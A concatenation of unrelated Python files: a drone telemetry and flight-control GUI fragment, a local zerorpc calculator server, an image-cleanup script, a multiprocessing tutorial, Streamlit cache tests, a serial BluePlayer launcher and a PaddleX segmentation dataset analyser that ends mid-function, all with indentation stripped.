self.label_imutest.setPalette(self.pe)
self.label_imutest.setText("get dis")
def _get_log_temp(self, _list, _item):
if self.imu_test_tag == 0:
return 0
if len(_list)<self.test_num:
_list.append(float(_item))
else:
_list[:] = _list[1:]+[float(_item)]
def write_imu(self,_str):
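# Dispatch one incoming telemetry dict: DISTANCE_SENSOR, SVO_POSITION_RAW,
# SYS_STATUS, HIGHRES_IMU and ATTITUDE messages update their UI labels and
# rolling sample logs.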
#print _str
if _str["message"] == "DISTANCE_SENSOR":
self.label_dis.setText(_str["value"])
if len(self._dis)<100:
self._dis.append(int(_str["value"]))
else:
self._dis = self._dis[1:]+[int(_str["value"])]
self._get_log_dis(self.distance_log, _str, "value")
self.judge_distance(self._dis, self.label_distance)
self._dis_max = max(self._dis)
self._dis_min = min(self._dis)
if _str["message"] == "SVO_POSITION_RAW":
self.label_svo_x.setText(_str["value_x"])
self.label_svo_y.setText(_str["value_y"])
if _str["message"] == "SYS_STATUS":
self.label_tmp.setText(_str["value"])
self.temp = _str["value"]
if _str["message"] == "HIGHRES_IMU":
#"abs_pressure"
if len(self.abs_pressure_list)<100:
self.abs_pressure_list.append(float(_str["abs_pressure"]))
else:
self.abs_pressure_list = self.abs_pressure_list[1:]+[float(_str["abs_pressure"])]
self._get_log(self.abs_pressure_log, _str, "abs_pressure")
self._get_log_temp(self.temp_log, self.temp)
self.judge_imu(self.abs_pressure_list, self.label_pressure,"abs_pressure")
#"xacc"
if len(self.x_acc_list)<self.test_num_ui:
self.x_acc_list.append(float(_str["xacc"]))
else:
self.x_acc_list = self.x_acc_list[1:]+[float(_str["xacc"])]
self._get_log(self.x_acc_log, _str, "xacc")
self.judge_imu(self.x_acc_list, self.label_xacc,"acc")
#peak_peak = max(self.x_acc_list)-min(self.x_acc_list)
#std = np.std(self.x_acc_list)
#self.label_xacc.setText("xacc:%.6f std:%.6f" % (peak_peak,std))
#if peak_peak>0.05 or std>0.03:
# self.label_xacc.setPalette(self.pe)
#else:
# self.label_xacc.setPalette(self.pe_black)
if len(self.x_gyro_list)<self.test_num_ui:
self.x_gyro_list.append(float(_str["xgyro"]))
else:
self.x_gyro_list = self.x_gyro_list[1:]+[float(_str["xgyro"])]
self.judge_imu(self.x_gyro_list, self.label_xgyro,"gyro")
self._get_log(self.x_gyro_log, _str, "xgyro")
#self.label_xgyro.setText("xgyro:%.6f std:%.6f" % ((max(self.x_gyro_list)-min(self.x_gyro_list)),np.std(self.x_gyro_list)))
#self.label_pitch.setText("yacc"+_str["yacc"])
if len(self.y_acc_list)<self.test_num_ui:
self.y_acc_list.append(float(_str["yacc"]))
else:
self.y_acc_list = self.y_acc_list[1:]+[float(_str["yacc"])]
self.judge_imu(self.y_acc_list, self.label_yacc,"acc")
self._get_log(self.y_acc_log, _str, "yacc")
#self.label_yacc.setText("yacc:%.6f std:%.6f" % ((max(self.y_acc_list)-min(self.y_acc_list)),np.std(self.y_acc_list)))
if len(self.y_gyro_list)<self.test_num_ui:
self.y_gyro_list.append(float(_str["ygyro"]))
else:
self.y_gyro_list = self.y_gyro_list[1:]+[float(_str["ygyro"])]
self.judge_imu(self.y_gyro_list, self.label_ygyro,"gyro")
self._get_log(self.y_gyro_log, _str, "ygyro")
#self.label_ygyro.setText("ygyro:%.6f std:%.6f" % ((max(self.y_gyro_list)-min(self.y_gyro_list)),np.std(self.y_gyro_list)))
#self.label_yaw.setText("zacc"+_str["zacc"])
if len(self.z_acc_list)<self.test_num_ui:
self.z_acc_list.append(float(_str["zacc"]))
else:
self.z_acc_list = self.z_acc_list[1:]+[float(_str["zacc"])]
self.judge_imu(self.z_acc_list, self.label_zacc,"acc")
self._get_log(self.z_acc_log, _str, "zacc")
#self.label_zacc.setText("zacc:%.6f std:%.6f" % ((max(self.z_acc_list)-min(self.z_acc_list)),np.std(self.z_acc_list)))
if len(self.z_gyro_list)<self.test_num_ui:
self.z_gyro_list.append(float(_str["zgyro"]))
else:
self.z_gyro_list = self.z_gyro_list[1:]+[float(_str["zgyro"])]
self.judge_imu(self.z_gyro_list, self.label_zgyro,"gyro")
self._get_log(self.z_gyro_log, _str, "zgyro")
#self.label_zgyro.setText("zgyro:%.6f std:%.6f" % ((max(self.z_gyro_list)-min(self.z_gyro_list)),np.std(self.z_gyro_list)))
if len(self.x_mag_list)<self.test_num_ui:
self.x_mag_list.append(float(_str["xmag"]))
else:
self.x_mag_list = self.x_mag_list[1:]+[float(_str["xmag"])]
self.judge_imu(self.x_mag_list, self.label_xmag,"mag")
self._get_log(self.x_mag_log, _str, "xmag")
if len(self.y_mag_list)<self.test_num_ui:
self.y_mag_list.append(float(_str["ymag"]))
else:
self.y_mag_list = self.y_mag_list[1:]+[float(_str["ymag"])]
self.judge_imu(self.y_mag_list, self.label_ymag,"mag")
self._get_log(self.y_mag_log, _str, "ymag")
if len(self.z_mag_list)<self.test_num_ui:
self.z_mag_list.append(float(_str["zmag"]))
else:
self.z_mag_list = self.z_mag_list[1:]+[float(_str["zmag"])]
self.judge_imu(self.z_mag_list, self.label_zmag,"mag")
self._get_log(self.z_mag_log, _str, "zmag")
if _str["message"] == "ATTITUDE":
self.label_roll.setText(_str["roll"])
self.label_pitch.setText(_str["pitch"])
self.label_yaw.setText(_str["yaw"])
burn_app=QtGui.QApplication(sys.argv)
burnshow=BurnWindow()
#sys.exit(burn_app.exec_())
#burnshow.show()
#main()
class CalcApi(object):
def calc(self, text):
"""based on the input text, return the int result"""
try:
result = real_calc(text)
return result
#return sum(text)
except Exception as e:
return e
def echo(self, text):
"""echo any text"""
return text
def rand(self):
return datetime.datetime.now()
import zerorpc
def parse_port():
return '4242'
def main():
addr = 'tcp://127.0.0.1:' + parse_port()
s = zerorpc.Server(CalcApi())
s.bind(addr)
print('start running on {}'.format(addr))
s.run()
main()
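# A minimal client-side sketch (kept as comments so this module runs as-is).
# It assumes the same zerorpc package on the client and that real_calc
# evaluates an arithmetic expression string:
#   client = zerorpc.Client()
#   client.connect('tcp://127.0.0.1:4242')
#   print(client.calc('1 + 1'))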
class MyWindow(QtGui.QMainWindow,Ui_MainWindow):
def __init__(self):
super(MyWindow,self).__init__()
self.setupUi(self)
def offboard(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('p_mode')
def position(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('p_mode')
def altitude(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('a_mode')
def manual(self):
print ('start test')
print (self.lineEdit.text())
#process_stdin('offboard')
process_stdin('m_mode %s' %str(self.verticalSlider.value()))
def takeoff(self):
process_stdin('takeoff3')
def hold(self):
process_stdin('h %s'%str(self.verticalSlider.value()))
def front(self):
process_stdin('x %s'%str(self.verticalSlider.value()))
def back(self):
process_stdin('x %s'%str(self.verticalSlider.value()*(-1)))
def left(self):
process_stdin('y %s'%str(self.verticalSlider.value()*(-1)))
def right(self):
process_stdin('y %s'%str(self.verticalSlider.value()))
def up(self):
#print self.verticalSlider.value()
#process_stdin('z %s'%str(int(self.verticalSlider.value()+200)))
process_stdin('z 350')
#process_stdin('z %s'%str(self.verticalSlider.value()*(-1)))
def down(self):
#process_stdin('z %s'%str(int(self.verticalSlider.value()-200)))
process_stdin('z -200')
#process_stdin('z %s'%str(self.verticalSlider.value()))
def yaw(self):
process_stdin('yaw')
def turn_left(self):
process_stdin('yaw %s' % str(self.verticalSlider.value()))
def turn_right(self):
process_stdin('yaw %s' % str(self.verticalSlider.value()*(-1)))
def land(self):
process_stdin('land2')
def download_log(self):
process_stdin('log download latest %s.bin'%self.lineEdit_2.text())
def disarm(self):
process_stdin('land2')
process_stdin('disarm')
def arm(self):
process_stdin('arm throttle')
def st(self):
process_stdin('st')
#myshow=MyWindow()
# use main program for input. This ensures the terminal cleans
# up on exit
while not mpstate.status.exit:
try:
if opts.daemon:
time.sleep(0.1)
else:
input_loop()
except KeyboardInterrupt:
if mpstate.settings.requireexit:
print("Interrupt caught. Use 'exit' to quit MAVProxy.")
#Just lost the map and console, get them back:
for (m,pm) in mpstate.modules:
if m.name in ["map", "console"]:
if hasattr(m, 'unload'):
try:
m.unload()
except Exception:
pass
reload(m)
m.init(mpstate)
else:
mpstate.status.exit = True
sys.exit(1)
#sys.exit(burn_app.exec_())
print "aaaaaaaa"
if opts.profile:
yappi.get_func_stats().print_all()
yappi.get_thread_stats().print_all()
#this loop executes after leaving the above loop and is for cleanup on exit
for (m,pm) in mpstate.modules:
if hasattr(m, 'unload'):
print("Unloading module %s" % m.name)
m.unload()
sys.exit(1)
#sys.exit(burn_app.exec_())
#burn_app.exec_()
|
step_00_remove_pil_error_images.py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 26 14:24:22 2018
@author: pilgrim.bin@163.com
"""
import os
import random
import argparse
import threading
import math
from PIL import Image
# usage: is_allowed_extension(filename, IMG_EXTENSIONS)
IMG_EXTENSIONS = ['.jpg', '.jpeg', '.png', '.ppm', '.bmp', '.pgm', '.tif']
def is_allowed_extension(filename, extensions):
filename_lower = filename.lower()
return any(filename_lower.endswith(ext) for ext in extensions)
# usage: mkdir_if_not_exist([root, dir])
def mkdir_if_not_exist(path):
if not os.path.exists(os.path.join(*path)):
os.makedirs(os.path.join(*path))
# usage: is_already_exists(src_file, dstpath)
def is_already_exists(src_file, dstpath):
filename = os.path.split(src_file)[-1]
dstfile = os.path.join(dstpath, filename)
return os.path.exists(dstfile)
# return all type filepath of this path
def get_filelist(path):
filelist = []
for root,dirs,filenames in os.walk(path):
for fn in filenames:
filelist.append(os.path.join(root,fn))
return filelist
def scanning_filelist(filelist):
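# Try to decode every image with PIL; files that fail to open or convert are
# deleted so they cannot break a later training/data-loading pass.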
extensions = IMG_EXTENSIONS
for filename in filelist:
if is_allowed_extension(filename, extensions):
try:
img = Image.open(filename)
img = img.convert('RGB')
except Exception:
print("Removing undecodable image: {}".format(filename))
os.remove(filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description='python main.py --path=data'
)
parser.add_argument(
"--path",
default='data',
type=str,
)
parser.add_argument(
"--workers",
default=100,
type=int,
)
args = parser.parse_args()
path = args.path
num_worker = args.workers
'''--------------------------------------'''
# get filelist
filelist = get_filelist(path)
random.shuffle(filelist)
# mt
task_per_worker = int(math.ceil(1. * len(filelist) / num_worker))
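# Each worker gets a contiguous ceil(len/num_worker) slice; with more workers
# than files the trailing slices are simply empty.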
threads = []
for i in range(num_worker):
sub_filelist = filelist[i * task_per_worker:(i + 1) * task_per_worker]
threads.append(
threading.Thread(target=scanning_filelist, args=(sub_filelist,))
)
for i in range(len(threads)):
threads[i].start()
for i in range(len(threads)):
threads[i].join()
print("Done.")
|
ex_3.py |
"""
Example 3:
How do I have processes communicate?
"""
# Imports
import multiprocessing as mp
from time import sleep
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def f1(q):
q.put('Hello I am subprocess 1')
sleep(0.05)
print(q.get())
q.put('Hello father!')
def f2(q):
print(q.get())
q.put('Nice to meet you, I am subprocess 2.')
def queue_example():
### Demonstrate Queue messaging
q = mp.Queue()
p1 = mp.Process(target=f1, args=(q,))
p2 = mp.Process(target=f2, args=(q,))
p1.start()
p2.start()
p1.join()
p2.join()
print(q.get())
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def f3(conn):
conn.send('Psst, I have a secret.')
print(conn.recv())
conn.close()
def f4(conn):
print(conn.recv())
conn.send('What is it?')
def pipe_example():
### Demonstrate Pipe messaging
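# mp.Pipe() returns two duplex Connection objects; give one end to each process.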
end1, end2 = mp.Pipe()
p1 = mp.Process(target=f3, args=(end1,))
p2 = mp.Process(target=f4, args=(end2,))
p1.start()
p2.start()
p1.join()
p2.join()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
def f(l, i):
l.acquire()
try:
print('hello world', i)
finally:
l.release()
def lock_example():
### Demonstrate printing Locks
lock = mp.Lock()
for num in range(10):
mp.Process(target=f, args=(lock, num)).start()
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
queue_example()
# pipe_example()
# lock_example() |
common_cache_test.py | # Copyright 2018-2021 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests that are common to both st.memo and st.singleton"""
import threading
from unittest.mock import patch
from parameterized import parameterized
import streamlit as st
from streamlit import script_run_context
from streamlit.caching import (
MEMO_CALL_STACK,
SINGLETON_CALL_STACK,
)
from streamlit.forward_msg_queue import ForwardMsgQueue
from streamlit.script_run_context import (
add_script_run_ctx,
get_script_run_ctx,
ScriptRunContext,
)
from streamlit.state.session_state import SessionState
from tests.testutil import DeltaGeneratorTestCase
memo = st.experimental_memo
singleton = st.experimental_singleton
class CommonCacheTest(DeltaGeneratorTestCase):
def tearDown(self):
# Some of these tests reach directly into CALL_STACK data and twiddle it.
# Reset default values on teardown.
MEMO_CALL_STACK._cached_func_stack = []
MEMO_CALL_STACK._suppress_st_function_warning = 0
SINGLETON_CALL_STACK._cached_func_stack = []
SINGLETON_CALL_STACK._suppress_st_function_warning = 0
# Clear caches
st.experimental_memo.clear()
st.experimental_singleton.clear()
# And some tests create widgets, and can result in DuplicateWidgetID
# errors on subsequent runs.
ctx = script_run_context.get_script_run_ctx()
if ctx is not None:
ctx.widget_ids_this_run.clear()
super().tearDown()
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_simple(self, _, cache_decorator):
@cache_decorator
def foo():
return 42
self.assertEqual(foo(), 42)
self.assertEqual(foo(), 42)
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_multiple_int_like_floats(self, _, cache_decorator):
@cache_decorator
def foo(x):
return x
self.assertEqual(foo(1.0), 1.0)
self.assertEqual(foo(3.0), 3.0)
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_return_cached_object(self, _, cache_decorator):
"""If data has been cached, the cache function shouldn't be called."""
with patch.object(st, "exception") as mock_exception:
called = [False]
@cache_decorator
def f(x):
called[0] = True
return x
self.assertFalse(called[0])
f(0)
self.assertTrue(called[0])
called = [False] # Reset called
f(0)
self.assertFalse(called[0])
f(1)
self.assertTrue(called[0])
mock_exception.assert_not_called()
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_mutate_args(self, _, cache_decorator):
"""Mutating an argument inside a memoized function doesn't throw
an error (but it's probably not a great idea)."""
with patch.object(st, "exception") as mock_exception:
@cache_decorator
def foo(d):
d["answer"] += 1
return d["answer"]
d = {"answer": 0}
self.assertEqual(foo(d), 1)
self.assertEqual(foo(d), 2)
mock_exception.assert_not_called()
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_ignored_args(self, _, cache_decorator):
"""Args prefixed with _ are not used as part of the cache key."""
call_count = [0]
@cache_decorator
def foo(arg1, _arg2, *args, kwarg1, _kwarg2=None, **kwargs):
call_count[0] += 1
foo(1, 2, 3, kwarg1=4, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([1], call_count)
# Call foo again, but change the values for _arg2, _kwarg2, and _kwarg4.
# The call count shouldn't change, because these args will not be part
# of the hash.
foo(1, None, 3, kwarg1=4, _kwarg2=None, kwarg3=6, _kwarg4=None)
self.assertEqual([1], call_count)
# Changing the value of any other argument will increase the call
# count. We test each argument type:
# arg1 (POSITIONAL_OR_KEYWORD)
foo(None, 2, 3, kwarg1=4, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([2], call_count)
# *arg (VAR_POSITIONAL)
foo(1, 2, None, kwarg1=4, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([3], call_count)
# kwarg1 (KEYWORD_ONLY)
foo(1, 2, 3, kwarg1=None, _kwarg2=5, kwarg3=6, _kwarg4=7)
self.assertEqual([4], call_count)
# **kwarg (VAR_KEYWORD)
foo(1, 2, 3, kwarg1=4, _kwarg2=5, kwarg3=None, _kwarg4=7)
self.assertEqual([5], call_count)
@parameterized.expand(
[
("memo", memo, MEMO_CALL_STACK),
("singleton", singleton, SINGLETON_CALL_STACK),
]
)
def test_cached_st_function_warning(self, _, cache_decorator, call_stack):
"""Ensure we properly warn when st.foo functions are called
inside a cached function.
"""
forward_msg_queue = ForwardMsgQueue()
orig_report_ctx = get_script_run_ctx()
add_script_run_ctx(
threading.current_thread(),
ScriptRunContext(
session_id="test session id",
enqueue=forward_msg_queue.enqueue,
query_string="",
session_state=SessionState(),
uploaded_file_mgr=None,
),
)
with patch.object(call_stack, "_show_cached_st_function_warning") as warning:
st.text("foo")
warning.assert_not_called()
@cache_decorator
def cached_func():
st.text("Inside cached func")
cached_func()
warning.assert_called_once()
warning.reset_mock()
# Make sure everything got reset properly
st.text("foo")
warning.assert_not_called()
# Test warning suppression
@cache_decorator(suppress_st_warning=True)
def suppressed_cached_func():
st.text("No warnings here!")
suppressed_cached_func()
warning.assert_not_called()
# Test nested st.cache functions
@cache_decorator
def outer():
@cache_decorator
def inner():
st.text("Inside nested cached func")
return inner()
outer()
warning.assert_called_once()
warning.reset_mock()
# Test st.cache functions that raise errors
with self.assertRaises(RuntimeError):
@cache_decorator
def cached_raise_error():
st.text("About to throw")
raise RuntimeError("avast!")
cached_raise_error()
warning.assert_called_once()
warning.reset_mock()
# Make sure everything got reset properly
st.text("foo")
warning.assert_not_called()
# Test st.cache functions with widgets
@cache_decorator
def cached_widget():
st.button("Press me!")
cached_widget()
warning.assert_called_once()
warning.reset_mock()
# Make sure everything got reset properly
st.text("foo")
warning.assert_not_called()
add_script_run_ctx(threading.current_thread(), orig_report_ctx)
@parameterized.expand(
[("memo", MEMO_CALL_STACK), ("singleton", SINGLETON_CALL_STACK)]
)
def test_multithreaded_call_stack(self, _, call_stack):
"""CachedFunctionCallStack should work across multiple threads."""
def get_counter():
return len(call_stack._cached_func_stack)
def set_counter(val):
call_stack._cached_func_stack = ["foo"] * val
self.assertEqual(0, get_counter())
set_counter(1)
self.assertEqual(1, get_counter())
values_in_thread = []
def thread_test():
values_in_thread.append(get_counter())
set_counter(55)
values_in_thread.append(get_counter())
thread = threading.Thread(target=thread_test)
thread.start()
thread.join()
self.assertEqual([0, 55], values_in_thread)
# The other thread should not have modified the main thread
self.assertEqual(1, get_counter())
@parameterized.expand(
[
("memo", memo, memo.clear),
("singleton", singleton, singleton.clear),
]
)
def test_clear_all_caches(self, _, cache_decorator, clear_cache_func):
"""Calling a cache's global `clear_all` function should remove all
items from all caches of the appropriate type.
"""
foo_vals = []
@cache_decorator
def foo(x):
foo_vals.append(x)
return x
bar_vals = []
@cache_decorator
def bar(x):
bar_vals.append(x)
return x
foo(0), foo(1), foo(2)
bar(0), bar(1), bar(2)
self.assertEqual([0, 1, 2], foo_vals)
self.assertEqual([0, 1, 2], bar_vals)
# Clear the cache and access our original values again. They
# should be recomputed.
clear_cache_func()
foo(0), foo(1), foo(2)
bar(0), bar(1), bar(2)
self.assertEqual([0, 1, 2, 0, 1, 2], foo_vals)
self.assertEqual([0, 1, 2, 0, 1, 2], bar_vals)
@parameterized.expand([("memo", memo), ("singleton", singleton)])
def test_clear_single_cache(self, _, cache_decorator):
foo_call_count = [0]
@cache_decorator
def foo():
foo_call_count[0] += 1
bar_call_count = [0]
@cache_decorator
def bar():
bar_call_count[0] += 1
foo(), foo(), foo()
bar(), bar(), bar()
self.assertEqual(1, foo_call_count[0])
self.assertEqual(1, bar_call_count[0])
# Clear just foo's cache, and call the functions again.
foo.clear()
foo(), foo(), foo()
bar(), bar(), bar()
# Foo will have been called a second time, and bar will still
# have been called just once.
self.assertEqual(2, foo_call_count[0])
self.assertEqual(1, bar_call_count[0])
|
__main__.py | import sys
import serial
import threading
from blueplayer import blueplayer
def main():
args = sys.argv[1:]
# first argument should be a serial terminal to open
if not args:
port = "/dev/ttyS0"
else:
port = args[0]
player = None
with serial.Serial(port, 19200) as serial_port:
try:
player = blueplayer.BluePlayer(serial_port)
player_thread = threading.Thread(target=player.start)
serial_thread = threading.Thread(target=player.run)
player_thread.start()
serial_thread.start()
player_thread.join()
serial_thread.join()
except KeyboardInterrupt:
print("\nBluePlayer cancelled by user")
except Exception as ex:
print("How embarrassing. The following error occurred {}".format(ex))
finally:
if player:
player.end()
player.stop()
if __name__ == "__main__":
main()
|
analysis.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import numpy as np
import os.path as osp
import cv2
from PIL import Image
import pickle
import threading
import multiprocessing as mp
import paddlex.utils.logging as logging
from paddlex.utils import path_normalization
from paddlex.cv.transforms.seg_transforms import Compose
from .dataset import get_encoding
class Seg:
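"""Semantic-segmentation dataset analyser.
Collects image shapes, per-channel pixel histograms, label distribution and
normalisation statistics (mean/std) over a file list."""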
def __init__(self, data_dir, file_list, label_list):
self.data_dir = data_dir
self.file_list_path = file_list
self.file_list = list()
self.labels = list()
with open(label_list, encoding=get_encoding(label_list)) as f:
for line in f:
item = line.strip()
self.labels.append(item)
with open(file_list, encoding=get_encoding(file_list)) as f:
for line in f:
items = line.strip().split()
if len(items) > 2:
raise Exception(
"A space is defined as the separator, but it exists in image or label name {}."
.format(line))
items[0] = path_normalization(items[0])
items[1] = path_normalization(items[1])
full_path_im = osp.join(data_dir, items[0])
full_path_label = osp.join(data_dir, items[1])
if not osp.exists(full_path_im):
raise IOError('The image file {} does not exist!'.format(
full_path_im))
if not osp.exists(full_path_label):
raise IOError('The label file {} does not exist!'.format(
full_path_label))
self.file_list.append([full_path_im, full_path_label])
self.num_samples = len(self.file_list)
def _get_shape(self):
max_height = max(self.im_height_list)
max_width = max(self.im_width_list)
min_height = min(self.im_height_list)
min_width = min(self.im_width_list)
shape_info = {
'max_height': max_height,
'max_width': max_width,
'min_height': min_height,
'min_width': min_width,
}
return shape_info
def _get_label_pixel_info(self):
pixel_num = np.dot(self.im_height_list, self.im_width_list)
label_pixel_info = dict()
for label_value, label_value_num in zip(self.label_value_list,
self.label_value_num_list):
for v, n in zip(label_value, label_value_num):
if v not in label_pixel_info.keys():
label_pixel_info[v] = [n, float(n) / float(pixel_num)]
else:
label_pixel_info[v][0] += n
label_pixel_info[v][1] += float(n) / float(pixel_num)
return label_pixel_info
def _get_image_pixel_info(self):
channel = max([len(im_value) for im_value in self.im_value_list])
im_pixel_info = [dict() for c in range(channel)]
for im_value, im_value_num in zip(self.im_value_list,
self.im_value_num_list):
for c in range(channel):
for v, n in zip(im_value[c], im_value_num[c]):
if v not in im_pixel_info[c].keys():
im_pixel_info[c][v] = n
else:
im_pixel_info[c][v] += n
return im_pixel_info
def _get_mean_std(self):
im_mean = np.asarray(self.im_mean_list)
im_mean = im_mean.sum(axis=0)
im_mean = im_mean / len(self.file_list)
im_mean /= self.max_im_value - self.min_im_value
im_std = np.asarray(self.im_std_list)
im_std = im_std.sum(axis=0)
im_std = im_std / len(self.file_list)
im_std /= self.max_im_value - self.min_im_value
return (im_mean, im_std)
def _get_image_info(self, start, end):
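# Worker body: for file indices [start, end), record image shape, per-channel
# mean/std and per-channel value histograms, plus label value counts.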
for id in range(start, end):
full_path_im, full_path_label = self.file_list[id]
image, label = Compose.decode_image(full_path_im, full_path_label)
height, width, channel = image.shape
self.im_height_list[id] = height
self.im_width_list[id] = width
self.im_channel_list[id] = channel
self.im_mean_list[
id] = [image[:, :, c].mean() for c in range(channel)]
self.im_std_list[
id] = [image[:, :, c].std() for c in range(channel)]
for c in range(channel):
unique, counts = np.unique(image[:, :, c], return_counts=True)
self.im_value_list[id].extend([unique])
self.im_value_num_list[id].extend([counts])
unique, counts = np.unique(label, return_counts=True)
self.label_value_list[id] = unique
self.label_value_num_list[id] = counts
def _get_clipped_mean_std(self, start, end, clip_min_value, clip_max_value):
for id in range(start, end):
full_path_im, full_path_label = self.file_list[id]
image, label = Compose.decode_image(full_path_im, full_path_label)
for c in range(self.channel_num):
np.clip(
image[:, :, c],
clip_min_value[c],
clip_max_value[c],
out=image[:, :, c])
image[:, :, c] -= clip_min_value[c]
image[:, :, c] /= clip_max_value[c] - clip_min_value[c]
self.clipped_im_mean_list[id] = [
image[:, :, c].mean() for c in range(self.channel_num)
]
self.clipped_im_std_list[
id] = [image[:, :, c].std() for c in range(self.channel_num)]
def analysis(self):
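# Full dataset pass: scan files with a small thread pool, aggregate shape and
# pixel statistics, plot per-channel histograms and pickle the summary info.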
self.im_mean_list = [[] for i in range(len(self.file_list))]
self.im_std_list = [[] for i in range(len(self.file_list))]
self.im_value_list = [[] for i in range(len(self.file_list))]
self.im_value_num_list = [[] for i in range(len(self.file_list))]
self.im_height_list = np.zeros(len(self.file_list), dtype='int64')
self.im_width_list = np.zeros(len(self.file_list), dtype='int64')
self.im_channel_list = np.zeros(len(self.file_list), dtype='int64')
self.label_value_list = [[] for i in range(len(self.file_list))]
self.label_value_num_list = [[] for i in range(len(self.file_list))]
num_workers = max(1, min(mp.cpu_count() // 2, 8))  # at least one worker, at most 8
threads = []
one_worker_file = len(self.file_list) // num_workers
for i in range(num_workers):
start = one_worker_file * i
end = one_worker_file * (
i + 1) if i < num_workers - 1 else len(self.file_list)
t = threading.Thread(target=self._get_image_info, args=(start, end))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
unique, counts = np.unique(self.im_channel_list, return_counts=True)
if len(unique) > 1:
raise Exception("There are {} kinds of image channels: {}.".format(
len(unique), unique[:]))
self.channel_num = unique[0]
shape_info = self._get_shape()
self.max_height = shape_info['max_height']
self.max_width = shape_info['max_width']
self.min_height = shape_info['min_height']
self.min_width = shape_info['min_width']
self.label_pixel_info = self._get_label_pixel_info()
self.im_pixel_info = self._get_image_pixel_info()
mode = osp.split(self.file_list_path)[-1].split('.')[0]
import matplotlib.pyplot as plt
for c in range(self.channel_num):
plt.figure()
plt.bar(self.im_pixel_info[c].keys(),
self.im_pixel_info[c].values(),
width=1,
log=True)
plt.xlabel('image pixel value')
plt.ylabel('number')
plt.title('channel={}'.format(c))
plt.savefig(
osp.join(self.data_dir,
'{}_channel{}_distribute.png'.format(mode, c)),
dpi=100)
plt.close()
max_im_value = list()
min_im_value = list()
for c in range(self.channel_num):
max_im_value.append(max(self.im_pixel_info[c].keys()))
min_im_value.append(min(self.im_pixel_info[c].keys()))
self.max_im_value = np.asarray(max_im_value)
self.min_im_value = np.asarray(min_im_value)
im_mean, im_std = self._get_mean_std()
info = {
'channel_num': self.channel_num,
'image_pixel': self.im_pixel_info,
'label_pixel': self.label_pixel_info,
'file_num': len(self.file_list),
'max_height': self.max_height,
'max_width': self.max_width,
'min_height': self.min_height,
'min_width': self.min_width,
'max_image_value': self.max_im_value,
'min_image_value': self.min_im_value
}
saved_pkl_file = osp.join(self.data_dir,
'{}_information.pkl'.format(mode))
with open(osp.join(saved_pkl_file), 'wb') as f:
pickle.dump(info, f)
logging.info(
"############## The analysis results are as follows ##############\n"
)
logging.info("{} samples in file {}\n".format(
len(self.file_list), self.file_list_path))
logging.info("Minimal image height: {} Minimal image width: {}.\n".
format(self.min_height, self.min_width))
logging.info("Maximal image height: {} Maximal image width: {}.\n".
format(self.max_height, self.max_width))
logging.info("Image channel is {}.\n".format(self.channel_num))
logging.info(
"Minimal image value: {} Maximal image value: {} (arranged in 0-{} channel order) \n".
format(self.min_im_value, self.max_im_value, self.channel_num))
logging.info(
"Image pixel distribution of each channel is saved with 'distribute.png' in the {}"
.format(self.data_dir))
logging.info(
"Image mean value: {} Image standard deviation: {} (normalized by the (max_im_value - min_im_value), arranged in 0-{} channel order).\n".
format(im_mean, im_std, self.channel_num))
logging.info(
"Label pixel information is shown in a format of (label_id, the number of label_id, the ratio of label_id):"
)
for v, (n, r) in self.label_pixel_info.items():
logging.info("({}, {}, {})".format(v, n, r))
logging.info("Dataset information is saved in {}".format(
saved_pkl_file))
def cal_clipped_mean_std(self, clip_min_value, clip_max_value,
data_info_file):
if not osp.exists(data_info_file):
raise Exception("Dataset information file {} does not exist.".
format(data_info_file))
with open(data_info_file, 'rb') as f:
im_info = pickle.load(f)
channel_num = im_info['channel_num']
min_im_value = im_info['min_image_value']
max_im_value = im_info['max_image_value']
im_pixel_info = im_info['image_pixel']
if len(clip_min_value) != channel_num or len(
clip_max_value) != channel_num:
raise Exception(
"The length of clip_min_value or clip_max_value should be equal to the number of image channel {}."
.format(channel_num))
for c in range(channel_num):
if clip_min_value[c] < min_im_value[c] or clip_min_value[
c] > max_im_value[c]:
raise Exception(
"Clip_min_value of the channel {} is not in [{}, {}]".
format(c, min_im_value[c], max_im_value[c]))
if clip_max_value[c] < min_im_value[c] or clip_max_value[
c] > max_im_value[c]:
raise Exception(
"Clip_max_value of the channel {} is not in [{}, {}]".
format(c, min_im_value[c], max_im_value[c]))
self.clipped_im_mean_list = [[] for i in range(len(self.file_list))]
self.clipped_im_std_list = [[] for i in range(len(self.file_list))]
num_workers = max(1, min(mp.cpu_count() // 2, 8))  # at least one worker, at most 8
threads = []
